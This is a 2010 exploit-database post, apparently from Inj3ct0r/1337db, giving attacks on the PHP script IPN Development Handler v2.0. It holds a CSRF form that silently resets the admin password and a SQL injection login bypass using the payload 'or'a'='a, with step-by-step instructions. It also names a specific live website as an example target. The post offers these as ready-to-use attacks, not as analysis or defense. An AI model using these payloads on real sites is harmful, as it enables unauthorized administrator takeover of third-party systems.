Home / os / win7

[webapps / 0day] - IPN Development Handler v2.0 Multiple Vul

Posted on 23 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>IPN Development Handler v2.0 Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='IPN Development Handler v2.0 Multiple Vulnerabilities by AtT4CKxT3rR0r1ST in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===================================================== IPN Development Handler v2.0 Multiple Vulnerabilities ===================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/ #################################################################### ===[ Exploit ]=== &lt;form method=&quot;POST&quot; name=&quot;form0&quot; action=&quot;http://localhost/siteadmin/EditInfo.php&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;admin&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;123456&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;password2&quot; value=&quot;123456&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;s1&quot; value=&quot;Update&quot;/&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; #################################################################### IPN Development Handler v2.0 Auth Bypass ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/ #################################################################### ===[ Vulnerability ]=== Source Code path/siteadmin/login.php if(isset($_POST[s2])) { $MyUsername1 = strip_tags($_POST[username1]); $MyPassword1 = strip_tags($_POST[password1]); if(empty($MyUsername1) || empty($MyPassword1)) { $MyError = &quot;&lt;center&gt;&lt;font color=red size=2 face=verdana&gt;&lt;b&gt;All fields are required!&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&quot;; } else { //check the login info if exists $q1 = &quot;select * from dd_admin where username = &#039;$MyUsername1&#039; and password = &#039;$MyPassword1&#039; &quot;; $r1 = mysql_query($q1); if(!$r1) { echo mysql_error(); exit(); ===[ Exploit ]=== 1- Go to Siteadmin [www.site.com/siteadmin/login.php] 2- join code Auth Bypass in Username &amp; Password 3- Username: &#039;or&#039;a&#039;=&#039;a Password: &#039;or&#039;a&#039;=&#039;a ===[ Example ]=== http://ashishmonga.com/siteadmin/login.php Username: &#039;or&#039;a&#039;=&#039;a Password: &#039;or&#039;a&#039;=&#039;a #################################################################### # <a href='http://1337db.com/'>1337db.com</a> [2010-12-23]</pre></body></html>

 

TOP